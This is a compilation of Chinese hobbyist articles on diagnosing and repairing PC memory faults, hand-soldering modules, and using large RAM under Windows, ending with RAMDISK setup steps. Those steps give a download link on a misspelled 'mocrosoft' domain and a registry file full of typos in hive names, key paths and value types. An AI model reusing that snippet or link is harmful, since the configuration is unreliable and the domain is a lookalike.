．对于大多数PC机来说，必须将一组中的所有插槽都插满，或者将一组全部置空(当然第一组不行)，在一组插槽中不能只插一部分内存条。 </P><P>　　．PC机可接受的内存大小有一个上限(最大值可从PC机说明书中找到。若没有说明书，唯一的方法就是从实践中找到最大值了)。 </P><P>　　．SDRAM是新一代的动态存储器，又称为同步动态存储器或同步DRAM。虽然有不少主板支持SDRAM与EDO内存混合安装，但是最好还是不要混用。原因是SDRAM只能在3.3V电压下工作，而EDO内存则多数在5V电压下工作。虽然主机板上对DIMM和SIMM分别供电，但它们的数据线总是要连在一起的，如果SIMM(72线内存)与DIMM(168线SDRAM)混用，尽管开始系统可以正常工作，但在使用一段时间后，可能会造成SDRAM的数据输入端被损坏。当然，如果你的SDRAM是适合宽电压(3V～5V)工作的产品，就不会出现这种损坏情况。 </P><P>　　4.如果故障还未解决，则用替换法检查内存条是否已损坏，并作出相应的处理。 </P><P>　　5.如果以上措施均不能奏效，则怀疑主板或控制芯片有问题，可送专业人员检修
                                                  摘自《家庭电脑世界》


内存故障分析大全

《一键清理系统垃圾》

内存故障分析大全

    大家在计算机故障维修过程中，遇到的最多的问题恐怕要属内存报警了。刚买两天的新机器会出现内存报警；使用一年的机器也会出现内存报警；天气突然降温的时候会出现内存报警；夏天长时间阴雨的时候也会出现内存报警；总之一句话，内存报警问题在计算机故障现象中出现频率最多，同时最容易解决----拆开机箱，把内存拔出来，再插一下就好了。严重一点的需要把机箱内的灰尘清除干净，或者换个内存插槽试一试。相对于其他计算机硬件故障，内存报警可以说是最简单的硬件故障了，就是没有接触过电脑的菜鸟，在电话的指导下也能够轻松此类问题。

    今天我们就来分析一下，为什么会现出内存报警，出现内存存报警后，如何解决此类问题？

    内存报警的根本原因有：

    1).内存损坏。

    2).主板的内存插槽损坏。

    3).主板的内存供电或相关电路有问题。

    4).内存与内存插槽接触不良。

  上述的1,2，3种故障都属于实实在在的硬件故障，我们可以通过替换排除法，查出故障元件，再对坏件进行维修或更换就能解决。对于第4种情况，我们遇到的最多，什么元件也没有损坏，就是二者接触不良造成的。

    内存与主板接触不良的原因有：

    1).内存插槽变形

    这种故障不是很常见，一般见于主板有形变，内存插槽有损坏，裂缝等现象，当我们把内存插入内存插槽时时就会出现部分接触不良的情况，当主机加电开机自检时就不能通过，就会出现连续的短“嘀”声，也就是大家常说的“内存报警”。对于主板形变，内存插槽变形的现象我们可以在内存插好后通过使用尼龙扎带紧固，再辅以打胶的方法来解决此类问题。

    不过，在拔插内存的过程中我们一定要注意内存的方向，虽然内存条和内存插槽有防呆设计，但是还有有许多菜鸟仍然把内存插反，造成内存条和内存插槽个别引脚烧熔的情况，这时只能放弃使用损坏的内存插槽。对于引脚烧熔的内存条，我们可以仔细检查一下，如果只是77和85接地端烧熔，也或许是其他内存条的接地端，即使把金手指烧得脱落了，这样的内存条因是接地端在反插时把电源正与地短路了，才造成打火烧毁内存条的金手指和内存插槽的引脚，而内存芯片却没有受到任何损伤，所以这样的内存条我们只要把其插在正常的内存插槽上就可以正常使用。

    有时我们还要注意内存插中是否有其他异物，因为如果有其他异物在内存插槽里，当插入内存时内存就不能插到底，内存无法安装到位，当然就会出现开机报警现象。当我们多次拔插内存仍不能解决问题时，最好仔细检查一下内存插槽是否变形，是否有引脚变形或损坏，脱落，插槽里是否有异物等情况，这样做对我们排除故障很有帮助。
    2).内存金手指氧化

    这种情况最容易出现，一般见于使用半年或一年以上的机器。当天气潮湿或天气温度变化较大时，就会出现昨天机器工作还好好的，可第二天早晨开机时即发现无法正常开机，显示器黑屏，只听得机内“嘀嘀“直响。

    这种情况如果只是偶尔一次也不值得大惊小怪，只要拆开机箱把内存条重插一下就可以了。不过如果这种故障每个月都发生一次或者一个星期或半个月就要出现一次，那就要考虑是不属于内存条与主板兼容性不好的问题了，也就是下面要说的第3种类型的问题。

    预防的方法：

    (1).采用第1种问题中所说的紧固方法解决；

    (2).再就是安装和检修时，一定不能用手直接接触内存插槽的金手指，因为我们手上的汗液会粘附在内存条的金手指上，如果内存的金手指做工不良或根本没有进行镀金工艺处理，那么内存条在使用过程中就很容易出现金手指氧化的情况，时间长了就会导致内存条与内存插槽接触不良，最后开机内存报警。对于内存条氧化造成的开机报警，我们不能简单的重新拔插一下内存了事，必须小心的使用橡皮把内存条的金手指认真擦一遍，擦得发亮为止，再插回去就可以了。

    (3).还有就是即使我们不经常使用电脑，也要每隔一个星期做到起码开机一次，让机器运行一两个小时，利用机器自身产生的热量把机器内部的潮气驱走，保持机器良好的运行状态。

    3).内存与主板兼容性不好

这种问题最难处理，也很难确定，故障出现的周期比较频繁，但是分别测试内存条和主板时往往又发现不了问题，处理起来非常麻烦。我在实际工作中，遇到最多的就是捷波主板与茂矽内存，这两者在一起使用经常出现开机内存报警的现象，拔插内存后故障消失，但是要不了一个月肯定还会再次出现。要想彻底解决只有更换其他牌号内存才行。

    常见的故障主板类型有：

    1).捷波J－694AST2与茂矽SDRAM128M内存，KINGMAX128M

    2).捷波P4MFM主板与茂矽SDRAM 256M内存

    3).捷波P4XFA主板与茂矽PC266　128MDDR内存


内存故障与分析

《一键清理系统垃圾》

内存故障与分析

  一、开机无显示
    由于内存条原因出现此类故障是比较普遍的现象，一般是因为内存条与主板内存插槽接触不良造成(在排除内存本身故障的前提下），只要用橡皮擦来回擦试其金手指部位即可解决问题（不要用酒精等清洗），还有就是内存损坏或主板内存槽有问题也会造成此类故障。
    由于内存条原因造成开机无显示故障，主机扬声器一般都会长时间蜂鸣（针对Award Bios而言）
二、windows系统运行不稳定，经常产生非法错误
    出现此类故障一般是由于内存芯片质量不良或软件原因引起，如若确定是内存条原因只有更换一途。
三、windows注册表经常无故损坏，提示要求用户恢复
    此类故障一般都是因为内存条质量不佳引起，很难予以修复，唯有更换一途。
四、windows经常自动进入安全模式
    此类故障一般是由于主板与内存条不兼容或内存条质量不佳引起，常见于PC133内存用于某些不支持PC133内存条的主板上，可以尝试在CMOS设置内降低内存读取速度看能否解决问题，如若不行，那就只有更换内存条了。
五、随机性死机
    此类故障一般是由于采用了几种不同芯片的内存条，由于各内存条速度不同产生一个时间差从而导致死机，对此可以在CMOS设置内降低内存速度予以解决，否则，唯有使用同型号内存。还有一种可能就是内存条与主板不兼容，此类现象一般少见，另外也有可能是内存条与主板接触不良引起电脑随机性死机，此类现象倒是比较常见。
六、内存加大后系统资源反而降低
    此类现象一般是由于主板与内存不兼容引起，常见于PC133内存条用于某些不支持PC133内存条的主板上，即使系统重装也不能解决问题。
七、windows启动时，在载入高端内存文件himem.sys时系统提示某些地址有问题
    此问题一般是由于内存条的某些芯片损坏造成，解决方法可参见下面内存维修一法。
八、运行某些软件时经常出现内存不足的提示
    此现象一般是由于系统盘剩余空间不足造成，可以删除一些无用文件，多留一些空间即可，一般保持在300M左右为宜。
九、从硬盘引导安装windows进行到检测磁盘空间时，系统提示内存不足
    此类故障一般是由于用户在config.sys文件中加入了emm386.exe文件，只要将其屏蔽掉即可解决问题。
    其实，从硬盘以DOS方式引导安装windows的方法比较复杂而且速度慢，其一，必须要在硬盘上安装DOS文件，且还要配置config.sys和autoexec.bat文件，若文件配置不当，还会引发一系例不可预见的故障，对于初学者很不实用。其二，windows装入成功后，由于每次启动系统都会调入config.sys与autoexec.bat文件来驱动光驱，使得系统启动时间延长，如若屏蔽掉config.sys与autoexec.bat后，在windows下有时光驱又不能正常工作。
十、安装windows进行到系统配置时产生一个非法错误
    此类故障一般是由于内存条损坏造成，可以按内存维修一法来解决，如若不行，那就只有更换内存条了。
十一、启动windows时系统多次自动重新启动
    此类故障一般是由于内存条或电源质量有问题造成，当然，系统重新启动还有可能是CPU散热不良或其他人为故障造成，对此，唯有用排除法一步一步排除。
十二、内存维修一法
    出现上面几种故障后，倘若内存损坏或芯片质量不行，如条件不允许可以用烙铁将内存一边的各芯片卸下，看能否解决问题，如若不行再换卸另一边的芯片，直到成功为止（如此焊工只怕要维修手机的人方可达到）。当然，有条件用示波器检测那就事半功倍了），采用此法后，因为已将内存的一边芯片卸下，所以内存只有一半可用，例如，64M还有32M可用，为此，对于小容量内存就没有维修的必要了。
    维修内存一定要小心谨慎，以免毁坏整条内存芯片！


内存混插故障一例

《一键清理系统垃圾》

内存混插故障一例

    由于这段时间内存价格持续下降，朋友拉了我这个“DIY高手”，直奔电脑城帮他买内存。因为我想HY64MB的PC133内存和PC100内存差价只有10元，而且性能更好，有利于以后升级，于是劝说朋友以280元买下一条PC133内存。
    在电脑城跑了两圈极品飞车3，又运行3DMARK99，都顺利通过，证明没有质量问题。于是拿回同学家，把内存插到了第二个插槽上。开机，自检。咦，为什么只有65536KB（64MB）?我的第一感觉是可能BIOS没设好，于是进到BIOS，找到内存相关的设置。由于同学原先使用的是一条PC100内存，所以我把PC133的内存参数设成与速度较低的PC100内存一致，SDRAM CLK：10ns；CAS：3；HOST CLK：AUTO。我心想这下没问题了，重启，自检，还是65536KB。奇怪，这是怎么回事呢?主板不支持PC133内存吗?于是我把以前的PC100内存拔下，开机，系统顺利认出PC133内存，进Win98也很正常。看来不是这个问题。这下我迷惑了，难道是主板兼容性不好，不能让PC133和PC100内存混插吗?应该不会呀，这块是技嘉最新的694X芯片的主板，BIOS已是最新的了，而且以技嘉这样主板大厂的实力，应该会考虑到兼容性的问题。这时我突然灵机一动，PC100内存原先是插在第一个插槽上的，何不与PC133内存换个插槽试试。插好后，重新开机，哇，131480KB（128MB），我又进入BIOS把内存参数设好，随着一阵欢快的音乐，顺利进入Win98，运行了3DMAX3，Photoshop等软件，又玩了半小时极品飞车3，都很稳定，速度也比以前64MB快一些，至此问题总算解决。
    事后，经过分析得出以下结论：无论PC100内存还是PC133内存，都有一个SPD芯片记录内存参数，而主板一般是通过SPD来读取内存参数的，而且读取是有序的，先读第一个插槽内存的参数，再读第二个，然后是第三个。因为原先第一个插槽上是PC100内存，第二个是PC133内存，因此只能读出第一个的参数，所以自检为64MB;而交换后，主板会自动读出较低内存参数，因而自检出了全部内存。因此建议升级内存的朋友，当内存参数不一致，需要混插时，一定要把速度快的插到第一个插槽上。


内存颗粒断脚处理

《一键清理系统垃圾》

内存颗粒断脚处理

    近日开机例行清理工作，清理好，组装完毕，开机却报警说明内存出错！随即断电，消除静电之后拔出内存条。仔细观察，PCB板上没有任何线断、短路，所有颗粒也没有烧毁的痕迹。回想，清理前、中、后没有进行任何误操作，所有插拔操作前都严格进行了防静电措施，排除静电击穿的可能。到底为什么？百思不得其解。谁料，内存条从手中滑落，竟挂在了毛衣上小心把它从毛衣上取下来，仔细观察颗粒焊脚，发现有一颗粒的1号脚横裂缝，加之刚才一挂，余脚翘在半空中回想清理时的操作原来是在取出内存条时不小心在硬盘电源插口处刮了一下，导致1号脚断裂。由于内存购买时间已超过一年，已无法享受保修服务，于是只好自己动手修复──焊好接脚！
        想到我的情况与2000年《电脑报》硬件周刊有一篇未署名的文章《自制工具巧修内存》（2000年合订本294页）处理的故障一样都是内存接脚剥离/断裂。查阅合订本，发现文中故障条为老式EDO内存，内存焊脚是向内弯后焊接在PCB板上的，比较粗。而我的内存条是HY原厂64M的内存，焊脚是L形直接焊在PCB板走线上的，焊脚极细，按文中介绍制作的烙铁头太粗，会烧断内存的针脚，根本无法焊接。难道750元的HY原厂条就这样玩完了吗？看来要想焊好这根条子只有改进焊接工艺！
        把25W内热式电烙铁烙铁头尽力磨得细长，将尖端1.5cm处弯曲30度左右（这样操作比较方便），然后将尖头0.3mm处凿平，呈鸭舌状。用松香酒精液将芯片焊脚处小面积刷一次，以免电路板工作发热引起粘连。然后加热烙铁并镀上焊锡，再细心地用鸭舌端焊接。由于横裂严重，所以将焊锡焊聚在断脚上呈芝麻状，然后用一尖细的东西（我用的是缝衣针）将焊脚按在PCB板走线上，待焊锡凝固后大功告成（因为是起始焊脚空隙较大，所以才将焊锡聚成芝麻状，若是颗粒中部焊脚断裂，也许只有找专业焊工或是送厂返修了）。将条子打整干净重新插入内存槽中，再次通电开机，哈哈，成功了，内存起死回生！


内存六种异常故障排除法

《一键清理系统垃圾》

内存六种异常故障排除法

    当启动电脑、运行操作系统或应用软件的时候、常常会因为内存出现异常而导致操作失败。笔者使用电脑多年，总结了一些内存出现异常的原因，并给出以下几种处理方法，希望可以给大家一些借鉴。

    故障一：内存条与主板插槽接触不良、内存控制器出现故障表现为：打开主机电源后屏幕显示“Error：Unable to ControlA20 Line”出错信息后死机。

    解决方法：仔细检查内存条是否与插槽保持良好接触或更换内存条。

    故障二：自检通过。在DOS状态下运行应用程序因占用的内存地址冲突，而导致内存分配错误，屏幕出现“Memory A11ocationError”的提示。

    解决方法：因Confis.sys文件中没有用Himem.sys、Emm386.exe等内存管理文件设置Xms.ems内存或者设置不当，使得系统仅能使用640KB基本内存，运行的程序稍大便出现“Out of Memory”(内存不足)的提示，无法操作。这些现象均属软故障，编写好系统配置文件Config.sys后重新启动系统即可。

    故障三：Windows系统中运行的应用程序非法访问内存、内存中驻留了太多应用程序、活动窗口打开太多、应用程序相关配置文件不合理等原因均能导致屏幕出现许多有关内存出错的信息。

    解决方法：此类故障必须采用清除内存驻留程序、减少活动窗口、调整配置文件(INI)，重装系统和应用程序等办法来处理。

    故障四：Windows系统中运行DOS状态下的应用软件(如DOS下运行的游戏软件等)时，因软件之间分配、占用内存冲突出现黑屏、花屏、死机现象。

    解决办法：退出Windows系统，进入DOS状态，再运行应用程序。

    故障五：程序有病毒，病毒程序驻留内存、CMOS参数中内存值的大小被病毒修改，将导致内存值与内存条实际内存大小不符、内存工作异常等现象。

    解决办法：采用杀毒软件消除病毒；CMOS中参数被病毒修改，先将CMOS短接放电，重新启动机器，进入CMOS后仔细检查各项硬件参数，正确设置有关内存的参数值。

    故障六：电脑升级进行内存扩充，选择了与主板不兼容的内存条。

    解决方法：首先升级主板的BIOS，看看是否能解决问题，如果仍无济于事，就只好更换内存条了。


内存品质的细微体现

《一键清理系统垃圾》

内存品质的细微体现

    现在市面上的内存条品种不少，见得多了好像都一样，没什么区别，但真正从细微点滴之处考量，内存其实并不一般。实际上，内存的真正品质也正是着这些细微之处所体现出来的。

    1、金手指工艺

    金手指实际是在一层铜皮（也叫覆铜板）上通过特殊工艺再覆上一层金，因为金不易被氧化，超强的导通性。内存处理单元的所有数据流、电子流正是通过金手指与内存插槽的接触与PC系统进行交换，是内存的输出输入端口，因此其工艺则显得相当重要，同时要耗费一定量的贵重金属——黄金，是内存成本的敏感部分。

    金手指的金层大致有两种工艺标准：化学沉金和电镀金。在目前市面销售的绝大多数内存的金手指金层都是采取化学沉金，化学沉金的原理是采用含金的特殊化学溶液，通过化学反应的形式将同溶液中离子态的金转化成原子态的金，也就是常见的黄金，原子态的金在铜皮表面附着，金原子越积越多，沉积在铜皮表面就形成金层，通过这种成金工艺，金层的厚度一般在3-5微米，很薄，很多优质内存的可能达到6微米，但因工艺限制，最后金层也不会超过10微米。这层薄金在安装过程与插槽很容易因磨擦而脱落，受损后的金层裸露在空气中，日积月累，特别是电流和高温的作用下，很容易在空气中被氧化，氧化层形成并不断扩展，而氧化物的导电性很差，从而造成数据流、电子流的不正常传输，自然系统的稳定性降低。

    另一种成金方式，是电镀金。电镀金是在含金电解液中的正极凝集，只要保证正负极存在，金的积淀就会持续下去，原理上金层厚度可以无限。金层厚度增加，在使用中能有效抗摩擦破损，防止氧化层产生，保证金手指与接触部位的良好导通性，因此这项奢侈工艺对系统稳定性非常有益。

  2、PCB板工艺

    DRAM和很多辅助元件、集成电路都在小小的一块PCB板上，PCB的质量优劣对整块内存的影响可见一斑。

    PCB板主要由铜皮（覆铜板）和玻璃纤维组成，内存用PCB一般分四层和六层，也就分别有4层或6层铜皮，铜皮作布线、接插元器件并防静电屏蔽之用，每片铜皮之间填充玻璃纤维。那么决定PCB质量优劣的因素主要有哪些呢？铜皮层数（也即PCB板层数）、铜皮质量是关键。

    其中，铜皮层数（也即PCB板层数）越多，电子线路的布线空间会更大，密密麻麻的线路将能得到最优化的布局，这就能有效的减少电磁干扰和不稳定因素。在运行过程中，伴随内存高速的数据交换存在强大的电子流，形成电子噪音，如果层数的增多，相应电磁屏蔽的效果就会更明显，这就进一步加强了稳定性。因此，6层PCB在其他方面都相同的前提下，肯定要比4层PCB稳定的多。

    那么，铜皮的质量又是怎么产生影响的呢？一般情况下，铜皮的表面越光滑，厚度约均匀对稳定性的贡献越大。相反，产生很大阻抗，稳定性就不能得到有效保证。一般来说名厂在铜皮的质量上都有严格的标准，阻抗值不得超过10Ω。

    3、焊接工艺

    焊接工艺似乎很简单，不就是将焊锡在连接点凝固，使得线路导通吗？道理确实不过如此，当是关键问题在于随随便便的焊接一下能否保证焊点的牢固，虽经年累月、磕磕碰碰都不松动脱落，是否能保证焊点处良好的导通性，不因为接触不良而影响正常工作，不产生接触电阻？因而，焊接的学问并不简单，焊接工艺也在品质方面起到至关重要的作用。

    焊接工艺中，焊锡的质量是重要因素。锡熔点低、不易腐蚀，是优良的焊接剂。但是锡也分等级，高等级锡在纯度、配比、锡球数量和大小以及相应的熔点温度上都表现不俗，值得一提的是锡球，锡在经过提纯后会经过特殊粉碎工艺将块状锡磨成极细小的锡球，再将锡球根据需要熔铸成各种形状，例如焊条等。在回炉焊中，锡球越细就越容易吸收热量，融化的更透彻，自然焊接就越紧密，不会出现虚焊现象。众所周知，真正在焊接时采用的并非纯锡，为了保障焊接速度和质量需添加助焊剂（一般为液态松香）和凝固力较好的铅等重金属，严格按照一定配比在双转向离心搅拌机中充分搅拌均匀，焊接的每一个环节都细致入微，分分见真功，很多高品质内存都始终从点滴入手，作出精品的。

    内存，PC数据存储交换的关键所在，动品质一发而动全PC系统，要想鉴别真正的高品质内存，要尽量往小处看，往细微之处深究。


内存条维修DIY

《一键清理系统垃圾》

内存条维修DIY

    上个月，在玩Photoshop时，电脑突然没有反应，画面静止不动，机器无法重新启动，我打开机箱，拔出内存条一看，一个小元件的焊点已熔化，不禁想起前段时间机器有数次启动自检显示乱码死机，重启动又正常的情况，再把内存条拿到朋友的机子上试也点不亮，用电烙铁重焊那个小元件，也不起作用。毫无疑问，我的内存条“罢工”了。
    内存条小小一块，价格却不低，能否省几两银子呢?我这个“江湖郎中”倒要试试运气！
    “兵马未动，粮草先行”，我费尽心机找寻有关资料。市面上芯片级的硬件书几乎没有，咱只好“杀牛偏用宰鸡刀”——用放大镜观察，用万用表测量通断。这是一根2MB×16片的杂牌168线SDRAM，据我的经验，集成块的电源引脚通常在最角上，经过反复观察和通断测量，确定引脚1（正面）和引脚85（反面）为电源引入脚，我焊掉了焊点熔化的小元件（位于85脚上方），并用刀片划断85脚的铜箔线，抱着试试看的想法，心想剩余的16M内存应该正常了吧！重新插入内存，检查一遍连线，开机，我不禁揉揉眼睛，自检32M通过，同时运行大型程序Photoshop和3DMAX没有出现错误，至此故障完全排除。
    总结一下，内存条两面为对称设计，由电源电路、译码电路和芯片组成。电源由金手指引入，经过小电阻电容后接到芯片的电源脚，地址线经过译码电路译码后连接到芯片的片选引脚。据此，内存条的损坏可分为两类：内存芯片的损坏和外围电路的损坏。值得一提的是，损坏的内存条往往会有焊点发亮，这是过流造成的，根据发亮焊点的位置就可以大概知道是哪部分出了故障。
    对于前者，表现为开机自检时内存测试不能通过，或者可以开机，但运行程序时频繁死机。它的修理办法是：一、用程序报错的地址推算出损坏的芯片，更换单个的芯片，这种方法可以使它完全恢复。手工焊接并非不可能，水货内存条都是在手工作坊内生产的。二、去掉外围电路的元件或割断金手指的连线，使损坏的单面不工作。内存的容量会减半。
    后者多为电源电路故障，因为电源电路工作在相对大电流状态。故障表现为开机点不亮，系统不自检，高级的主板还会发出连续的嘀嘀报警声。损坏的小元件会导致电源电路的失常，由我的例子可见，内存两面的电源是通过内存条中许许多多的通孔连接在一起的，只要将损坏的小元件去掉，损坏面的电源脚割断，就OK了。
    以上为个人意见，仅供参考！维修有风险，动手须谨慎！！


剖析Windows用1G内存还慢的原因

《一键清理系统垃圾》

剖析Windows用1G内存还慢的原因

现在的内存基本达到了1元/MB的均价，不少朋友的电脑告别了可怜的64MB、128MB内存，256MB已经成为标准配制，512MB甚至1GB的内存也不再是"耸人听闻"。但是有一件事情让很多朋友疑惑："为什么使用1G内存我的Windows启动、软件运行速度还是这么慢？"
  安装大容量内存后，系统、程序运行效率没有得到大幅度提高，这是因为系统本身运行机制限制了其管理和运用硬件资源的能力。所以纵然硬件资源非常丰厚，如果超出了Windows管理的范围，那么性能也不会得到明显提升。
    内存和硬盘
    许多菜鸟常常将物理内存和硬盘混淆在一起，因为两者的容量都是用MB或GB这类的单位表示，说明物理内存和硬盘之间关系的最好比喻是：一个带一张桌子和一个文件柜的小办公室。
    文件柜就像硬盘，程序和数据可以长期安全地存放在那里，桌面代表物理内存，允许在办公桌上工作的人(作用和处理器相同)直接用放在桌面上的任何文件(程序和数据)。为了对一个特定文件进行操作，首先必须从文件柜中取出文件并放在桌面上。如果桌面够大，可以在桌面上同时打开多个文件。类似地，如果你有更多物理内存，那么可以运行更多或更大的程序并对更多或更大的资料进行处理。
    给电脑增加硬盘空间就好比在办公室里放一个更大的文件柜，而增加更多内存就好比得到一个更大的办公桌，可以同时对更多程序和数据进行操作。
    一、Windows这样使用内存
    想要知道为什么系统速度提升不再明显，必须先理解Windows 怎样使用内存。这里要涉及一个概念——资源。
    这不是平时所说的CPU资源，内存资源或统一的"系统"资源。我们接下来要讲到的"资源"就是程序可以操纵的Windows物件。举例来说，屏幕上显示的每个窗口都是一个资源，每幅图片也都可以能是一个资源。如果一个应用程序打开了磁盘上的一个文件，那么这个被打开的文件也是一个资源。以此类推，如果一个应用程序需要使用一个资源，它就会向操作系统提出请求，要求新建一个或从存储器里调用。
    1．情景再现：程序与系统的对话
    程序说："嗨，Windows，我要新建一个300像素宽，200像素高的窗口，ok？"于是，Windows立即按要求创建或调用这个资源进内存，然后反馈给应用程序一个代号："好，我已经创建好你要的窗口，它的代号是&#35;38710。"此后，需要用到新建的这个窗口时，应用程序都用Windows反馈的代号代表这个资源。"Windows，麻烦你在显示屏幕左上角显示&#35;38710。""好！"最后，当应用程序不需要用到该资源的时候，它会要求Windows去除这个资源。"OK，请你删除&#35;38710。""好！"。
    2．指针——内存中的邮政编码
    那么这个代号是依据什么标准生成的呢？在绝大多数操作系统中，它是靠一种叫做"指针"的东西来确定的。你可以把整个内存想像成一个邮局，邮递员把需要寄往各地的信件分类放到很多个不同的信箱里。信箱一个接一个，足足占据了一堵墙。每个心细那个都装了一些信件，包含要送往一个特定地区的信息。而且，就好像每个地区都有邮政编码一样，每一块可以存储数据的内存空间也有一个地址——指针。代表这个存储空间的一串数字。内存中某部分数据的"指针"，也就是这些数据占据的第一处内存空间的地址。所以，如果我是一个普通的操作系统，有一个应用程序要求我调用一个窗口，我就会按照它告诉我的要求调用这个窗口进内存，如果这个资源的数据在内存中存储的地址开始于&#35;1234567，那么我就会返回一条信息给应用程序："好了，我调出了这个窗口，它是&#35;1234567。"
    3．解决指针带来的问题
    在PC中，这种指针有4个字节长。所以如果一个应用程序需要给内存里的某个数据配一个指针，那就需要4字节的内存空间。这样的工作方式给早期的Windows设计者带来了不小的麻烦，因为那时制作工艺尚不发达，内存非常昂贵，一台电脑上有8MB的内存就足以让用户无数次从梦里笑醒了，大多数电脑只能配制4MB内存。在内存如此紧张的情况下，一个应用程序却经常需要用到几百万个资源。要用这些资源，就要个每个资源配发一个指针。每个指针占据4个字节，几百万个指针，就会消耗掉数量客观的一块内存空间。这就好比一份钱很少，但如果要发给全国人民每人一份钱，那就是至少一千三百万元的巨款了。
    所以，Windows设计者采用了另外一种替代方案。他们创建了资源表。就是把当前调入内存的所有资源的信息登记到一个清单。这样一来，当应用程序要求系统调用一个资源时，系统调用后就不给它配发指针了，而是直接告诉应用程序该资源在资源表中的序号。"好了，我已经调用了你需要的资源，它在资源表里面的序号是&#35;383"因为需要不是内存地址，所以就可以用一个只需占用2字节的数字表示。这只是两个字节的差距。但当你只有几MB内存，而你运行的程序动咎调用大量资源时，这两字节的差距就会带来很大的优势。

    你知道吗？
    微软64位操作系统没1GB内存就别玩
    在32位Windows 2000/XP中，最大支持4GB的内存，每个应用程序最多只能使用2GB内存，因为另一半的内存也留给系统使用了。而在64位WindowsXP中，这个限制没有了，每个程序能完全使用4GB内存，除Windows，微软还在开发64位版本的SQL Server 2000和Windows Server2003，不过要运行这些应用程序，需要你的电脑至少得有1GB内存。

    4．时过境迁，妙计成缺陷
    但这种方法也有它的弊端——两个字节能够表现的不同数字非常有限
    我们可以做个实验：请你写不同的数字。如果只准你写一位数，那就只能写出十个不同数字。如果限制写两位数，虽然能写出更多，但总数仍然有限。以此类推，允许位数越多，能写出的不同数字就越多。但只要位数有限制，写出的不同数字的总数就始终有限。同理，如果允许系统使用4字节的序号，那么在这个"位数限制"下，可以有几十亿个不同的序号可供使用。但如果只准系统使用2字节序号，能用的序号就会锐减到65536个。于是，前面我们讲的资源表就不能无限的拉长。其中的序号最多只有65536个
    于是问题来了。当调用了65536个资源后，再想调用更多的资源，纵然内存空间还有1GB，足以存储数百亿个资源，但只有2字节的资源表却无法生成更多的序号！没有序号，就意味着无法将各资源区分开来，应用程序自然无法使用这些没有"户口"的资源！事实上，因为没有序号可用，系统根本无法同时调用65536个以上的资源。
    但在10MB内存都是奢望的年代，要同时调用数十万个资源根本就是"无稽之谈"。所以当时的Windows设计者们没有把这个问题放在心上，果断地选用了资源表，选用了2字节序号。
    今天，操作系统算是得到报应了。内存便宜了，资源表和2字节序号仍然给我们节省了内存空间，但它带来的坏处却远远超过了它带来的好处。我们有足够的内存空间，可以调用数百万个资源，但资源表里面只有65536个序号！所以同一时间内，内存中只能有65536个资源！还有1GB内存空间可用？等着吧！
    5．真正"耗资源"的是谁？
    明白了上面的道理，就不难分辨除了大个文件，大个程序外，真正消耗系统资源的是哪些程序了：
    ★ 调用大量细小资源，把桌面装饰的花里胡哨的软件
    ★ 各种多媒体播放软件
    ★ 监视系统的工具软件
    ★ 能在字体菜单里面预览字体的应用程序(如MS Office)
    另外，在Windows 9x n/Me中运行16位程序(如DOS程序)时，Windows会划定一块内存供所有这类程序使用。除非所有16位程序都已经关闭，这块内存是不会被释放的。
    6．大内存的优势到底在哪里？
    难道大内存就没有作用了吗？内存厂商在骗钱？当然不是。当一个应用程序被启动后，Windows的一些组件也随之被启动，这是很常见的事情。当应用程序被关闭，Windows会保留那些组件不关闭，因为可能很快还要用到。同理，程序启动时调进内存的少数资源，也不会随着程序关闭而退出内存。
    这时，大内存的有时正可以得到体现了。一方面，大内存可以一次性容纳大量数据，减少使用性能远不如内存的硬盘作为虚拟内存使用的几率，提高数据调用速度。另一方面，关闭程序过后，更多的常用数据会有充足的空间保留在内存中不被清除。一旦重启程序，你会发现明显比使用小内存时快！
    二、大内存使用精要
    1．把内存变成你的硬盘
    如果你的内存实在富裕，那么可以使用微软专门为Windows2000设计的RAMDISK，它能把部分内存虚拟成一块硬盘，把本来保存在硬盘的数据虚拟到内存中。比如，将Windows的临时文件，Internet的临时文件放置到这个虚拟磁盘中。大家知道，内存的速度要比硬盘速度快多了，这样能大幅提高数据读取速度，使Windows运行更加高效，同时，由于数据实际保存在内存中，所以在关机后，其中的数据就会消失，因此能在一定程度上加强系统安全性。

第一步：从
http://www.download.mocrosoft.com/download/win2000ddk/sample01/1/nt5/EN-US/ramdisk.exe
下载RAMDISK。并将其解压缩到一个临时文件夹中，比如C：\RAMDISK
    第二步：点击"开始-设置-控制面板"，双击打开"添加/删除硬件"，接着选择"添加/排除设备故障"并单击"下一步按钮"；在出现的"选择一个硬件设备"窗口中选中"添加新设备"项，然后单击"下一步"按钮；在接下来的窗口中选择"否，我想从列表中选择硬件"并单击"下一步"按钮；接着在"硬件类型"列表中选择"其他设备"并单击"下一步"；在出现的窗户口中单击"从磁盘安装"按钮，在弹出的"从磁盘安装"窗口中将"厂商文件复制来源"设置为"c:\RAMDISK"，确定后即出现选择窗口，选中"型号"列表中的"Ramdisk Driver"项并单击"下一步"按钮，期间Windows会出现"没有找到数字签名"的对话框，单击"是"按钮进行安装。
    第三步：打开"记事本"，输入以下文字，并将其保存为Ramdisk.reg
    Windows Registry Editor Version 5.00
    [HEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Servioes\Ramdisk\Parameters]
    "BreakOnEntry"=dword:00000000
    "DebugLevel"=dword:00000000
    "DebugComp"=dword:ffffffff
    "DiskSize"=dword:01f00000
    "DriveLetter"="R:"
    "RootDirEntries"=dword:00000200
    "SectorsPerCluster"=dowrd:00000002
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment]
    "TEMP"="R:\\"
    "TMP"="R:\\"
    [HKEY_CURRENT_USER\Environment]
    "TEMP"=R:\\"
    "TMP"="R:\\"
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache"="R:\\"
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders]
    "Cache"="R:\\"
    [HKEY_USERS\.DEFAULT\Environment]
    "TEMP"=R:\\"
    "TMP"="R:\\"
    [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache"="R:\\"
    [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders]
    "Cache"="R:\\"
    完成后，双击Ramdisk.reg，将其导入注册表。以上注册表数据可以在http://www.cfan.com.cn/下载。

    小提示
    Ramdisk.reg文件中键含义为：
    Parameters：设置Ramkisk的盘符为R，大小为30.9MB
    Session Manager\Environment：设置系统的TEMP和TMP环境变量到虚拟驱动器R。
